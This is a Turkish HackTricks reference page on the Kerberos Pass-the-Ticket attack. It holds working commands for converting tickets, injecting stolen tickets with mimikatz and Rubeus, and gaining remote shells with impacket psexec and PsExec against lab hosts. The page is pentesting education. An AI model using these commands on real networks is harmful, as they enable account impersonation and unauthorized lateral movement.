Pass the Ticket

AWS hackleme konusunda sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
[Resmi PEASS & HackTricks ürünleri]'ni edinin (https://peass.creator-spring.com)
[The PEASS Ailesi]'ni keşfedin (https://opensea.io/collection/the-peass-family), özel [NFT'ler]'imiz koleksiyonunu keşfedin (https://opensea.io/collection/the-peass-family)
Katılın 💬 [Discord grubuna] (https://discord.gg/hRep4RUj7f) veya [telegram grubuna] katılın (https://t.me/peass) veya bizi Twitter 🐦 [@carlospolopm]'de takip edin (https://twitter.com/hacktricks_live).
Hacking püf noktalarınızı paylaşarak [HackTricks] (https://github.com/carlospolop/hacktricks) ve [HackTricks Cloud] (https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek.

[Trickest]'i kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen ve iş akışlarını otomatikleştiren bir platform oluşturun. Bugün Erişim Alın:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Bilet Geçirme (PTT)

Bilet Geçirme (PTT) saldırı yönteminde, saldırganlar bir kullanıcının kimlik doğrulama biletini çalarlar ve şifre veya hash değerlerini değil. Bu çalınan bilet daha sonra kullanılarak kullanıcıyı taklit ederler, ağ içindeki kaynaklara ve hizmetlere yetkisiz erişim elde ederler.

Oku:

Linux ve Windows biletlerinin platformlar arasında değiştirilmesi

ticket_converter aracı, sadece bilet ve bir çıktı dosyası kullanarak bilet formatlarını dönüştürür.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Bilet Geçirme Saldırısı

Windows'ta Kekeo kullanılabilir.

Linux

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

Windows

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Referanslar

https://www.tarlogic.com/blog/how-to-attack-kerberos/

Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen otomatik iş akışları oluşturun ve otomatikleştirin. Bugün Erişim Alın:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
Resmi PEASS & HackTricks ürünlerini edinin
The PEASS Family'yi keşfedin, özel NFT'lerimiz koleksiyonumuz
💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter'da 🐦 @carlospolopm takip edin.**
Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.

PreviousOver Pass the Hash/Pass the Key NextPassword Spraying / Brute Force

Last updated 3 days ago